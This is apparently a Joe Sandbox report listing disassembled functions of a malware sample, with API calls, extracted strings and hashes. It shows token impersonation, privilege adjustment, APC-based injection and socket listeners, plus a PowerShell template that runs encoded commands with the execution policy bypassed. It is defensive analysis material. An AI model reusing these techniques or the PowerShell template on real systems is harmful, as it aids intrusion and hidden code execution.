                    • Opcode ID: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                    • Instruction ID: a41121ecebb48c11a1d8c2787aaf8ced3d8e74097b573b9f87d3053120b2844f
                    • Opcode Fuzzy Hash: 9d83564e1f44511746efc6243833ea10ca1e0c0cc6e5e094e442fc0115aecad6
                    • Instruction Fuzzy Hash: 8D3225726486D496EB29CB55D544FBE7BB0F776784F28100EEF4A47AA9DB38C840CB00
                    Function 001C5914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                    • String ID: U
                    • API String ID: 3902385426-4171548499
                    • Opcode ID: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                    • Instruction ID: 22f53ffff2642abfb00545f65aa01530eb72d904a6e8a21be2e57ddf3167229a
                    • Opcode Fuzzy Hash: 1e306023ed328bab19b7a5d60cdebdd92491a2c212ad1309fcb9b443deab4914
                    • Instruction Fuzzy Hash: F7022533214B8186DB208F28E484BAEB776F7A5798F54011EEB8943B54DF3DE985CB10
                    Function 00677B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _snprintf.LIBCMT ref: 00677D66
                    • _snprintf.LIBCMT ref: 00677D83
                    • _snprintf.LIBCMT ref: 00677CA5
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • _snprintf.LIBCMT ref: 00677FD8
                    • _snprintf.LIBCMT ref: 00678334
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                    • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                    • API String ID: 3442832105-1222817042
                    • Opcode ID: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                    • Instruction ID: f165d54bb1ff977ae2693509bbd572190c045ac707b9e2ef795a30137aa3c4d4
                    • Opcode Fuzzy Hash: 412d66828e9d0a494a073441381b0bd2cf94e887e51df8164056f8f6c456b4ac
                    • Instruction Fuzzy Hash: B032E962614E8592EB258F2DE0452E9B3B1FF98799F049101EF8D17B21EF38D6A7C344
                    Function 00671C30 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 00671C63
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                      • Part of subcall function 0066D074: htonl.WS2_32 ref: 0066D07F
                    • GetCurrentDirectoryA.KERNEL32 ref: 00671CDB
                    • FindFirstFileA.KERNEL32 ref: 00671D14
                    • GetLastError.KERNEL32 ref: 00671D23
                    • free.LIBCMT ref: 00671D5E
                    • free.LIBCMT ref: 00671D6B
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • FileTimeToSystemTime.KERNEL32 ref: 00671D78
                    • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00671D89
                    • FindNextFileA.KERNEL32 ref: 00671E46
                    • FindClose.KERNEL32 ref: 00671E57
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                    • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                    • API String ID: 723279517-1754256099
                    • Opcode ID: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                    • Instruction ID: fb2f42af140046c5152ca76007fff4314e7617e9a63a981f5e9d9da63bfdfffd
                    • Opcode Fuzzy Hash: 457427d9072a94c5804b99a9cf994faefb62e403f1d248ccd724e43b7fc9f85d
                    • Instruction Fuzzy Hash: D051CF7270875196DB50DF66E8507AEA3A2F385B84F40402AEE4E47B58EF7CC60ACB40
                    Function 001B6F38 Relevance: 18.5, APIs: 10, Strings: 2, Instructions: 545COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _snprintf.LIBCMT ref: 001B7166
                    • _snprintf.LIBCMT ref: 001B7183
                    • _snprintf.LIBCMT ref: 001B70A5
                      • Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
                      • Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E
                    • _snprintf.LIBCMT ref: 001B73D8
                    • _snprintf.LIBCMT ref: 001B7734
                    Strings
                    • not create token: %d, xrefs: 001B7657
                    • nop -exec bypass -EncodedCommand "%s", xrefs: 001B74D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$_errno_invalid_parameter_noinfo
                    • String ID: nop -exec bypass -EncodedCommand "%s"$not create token: %d
                    • API String ID: 3442832105-3652497171
                    • Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                    • Instruction ID: 2f9b2cb9d9b2c9bc8f052c9aa5cc4283acf63cc8586ad332c123fcfba5c15db3
                    • Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
                    • Instruction Fuzzy Hash: 5732FC62618EC492EB259F2DE0413E9B3B0FFA8799F445501DF8917B65EF38D2A6C340
                    Function 00670F34 Relevance: 18.2, APIs: 12, Instructions: 163processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessAsUserA.ADVAPI32 ref: 00670F8F
                    • GetLastError.KERNEL32 ref: 00670F9D
                    • GetLastError.KERNEL32 ref: 00670FC1
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                    • CreateProcessA.KERNEL32 ref: 00671013
                    • GetLastError.KERNEL32 ref: 0067101D
                    • GetCurrentDirectoryW.KERNEL32 ref: 00671374
                    • GetCurrentDirectoryW.KERNEL32 ref: 00671388
                    • CreateProcessWithTokenW.ADVAPI32 ref: 006713D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                    • String ID:
                    • API String ID: 3044875250-0
                    • Opcode ID: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                    • Instruction ID: ddd496feb17ee8c2b893683ede9fb43acc4ce5d056f1b139581cf5cf7671d55c
                    • Opcode Fuzzy Hash: 1d990aa2536e0bdd41909587e15d765ca5c4192818fd4d96a304531b1bef1f0e
                    • Instruction Fuzzy Hash: EA619B72214B40D6EB20DF25E89435E73A6F749B94F10812AEA4E87B18DF7DC8A5CB50
                    Function 00679220 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                    Download Yara Rule
                    APIs
                    • malloc.LIBCMT ref: 0067924F
                      • Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
                      • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                      • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                      • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                      • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                    • _snprintf.LIBCMT ref: 00679267
                      • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                      • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                    • FindFirstFileA.KERNEL32 ref: 00679272
                    • free.LIBCMT ref: 0067927E
                      • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                      • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                      • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                    • malloc.LIBCMT ref: 006792CE
                    • _snprintf.LIBCMT ref: 006792E6
                    • free.LIBCMT ref: 0067930E
                    • FindNextFileA.KERNEL32 ref: 00679327
                    • FindClose.KERNEL32 ref: 00679338
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                    • String ID: %s\*
                    • API String ID: 2620626937-766152087
                    • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                    • Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
                    • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                    • Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314
                    Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON
                    Download Yara Rule
                    APIs
                    • RtlCaptureContext.KERNEL32 ref: 00401A84
                    • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                    • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                    • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                    • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                    • GetCurrentProcess.KERNEL32 ref: 00401B34
                    • TerminateProcess.KERNEL32 ref: 00401B42
                    • abort.MSVCRT ref: 00401B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                    • String ID: @5E
                    • API String ID: 4278921479-727458683
                    • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                    • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                    • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                    • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                    Function 00673A64 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113sleepprocesslibraryCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32 ref: 00673ACE
                    • GetProcAddress.KERNEL32 ref: 00673ADE
                      • Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
                      • Part of subcall function 00673984: free.LIBCMT ref: 00673A45
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
                    • Thread32Next.KERNEL32 ref: 00673B7A
                    • Sleep.KERNEL32 ref: 00673B90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                    • String ID: NtQueueApcThread$ntdll
                    • API String ID: 1427994231-1374908105
                    • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                    • Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
                    • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                    • Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744
                    Function 00676A78 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonsioctlsocketlistensocket
                    • String ID:
                    • API String ID: 1767165869-0
                    • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                    • Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
                    • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                    • Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700
                    Function 00676670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                    • String ID:
                    • API String ID: 3910169428-0
                    • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                    • Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
                    • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                    • Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740
                    Function 0067DF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD
                    • LogonUserA.ADVAPI32 ref: 0067DF98
                    • GetLastError.KERNEL32 ref: 0067DFA2
                      • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                      • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                      • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                    • ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
                    • GetLastError.KERNEL32 ref: 0067DFCA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                    • String ID: %s\%s
                    • API String ID: 3621627092-4073750446
                    • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                    • Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
                    • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                    • Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45
                    Function 0066FA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountSleepTick$closesocket
                    • String ID:
                    • API String ID: 2363407838-0
                    • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                    • Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
                    • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                    • Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45
                    Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                    • GetCurrentProcessId.KERNEL32 ref: 004019E0
                    • GetCurrentThreadId.KERNEL32 ref: 004019E8
                    • GetTickCount.KERNEL32 ref: 004019F0
                    • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                    • String ID:
                    • API String ID: 1445889803-0
                    • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                    • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                    • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                    • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                    Function 0067EE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: bindclosesockethtonslistensocket
                    • String ID:
                    • API String ID: 564772725-0
                    • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                    • Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
                    • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                    • Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704
                    Function 0066D83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: %s!%s
                    • API String ID: 0-2935588013
                    • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                    • Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
                    • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                    • Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744
                    Function 00670B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
                    • AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
                    • GetLastError.KERNEL32 ref: 00670C24
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                    • String ID: %s
                    • API String ID: 4244140340-620797490
                    • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                    • Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
                    • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                    • Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390
                    Function 00675854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                    Download Yara Rule
                    APIs
                    • GetTickCount.KERNEL32 ref: 0067587B
                    • Sleep.KERNEL32 ref: 006758CA
                    • GetTickCount.KERNEL32 ref: 006758D0
                    • WSAGetLastError.WS2_32 ref: 006758DA
                      • Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$ErrorLastSleepioctlsocket
                    • String ID:
                    • API String ID: 1121440892-0
                    • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                    • Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
                    • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                    • Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344
                    Function 001CB7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $<$ailure #%d - %s$e '
                    • API String ID: 0-963976815
                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44
                    Function 0066DA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00676114: htonl.WS2_32 ref: 00676131
                    • GetLastError.KERNEL32 ref: 0066DD33
                      • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                    • HeapCreate.KERNEL32 ref: 0066DCDA
                    • HeapAlloc.KERNEL32 ref: 0066DCF8
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                    • String ID:
                    • API String ID: 3419463915-0
                    • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                    • Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
                    • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                    • Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300
                    Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID: signal
                    • String ID:
                    • API String ID: 1946981877-0
                    • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                    • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                    • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                    • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                    Function 0068C3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE
                    Download Yara Rule
                    Strings
                    Memory Dump Source
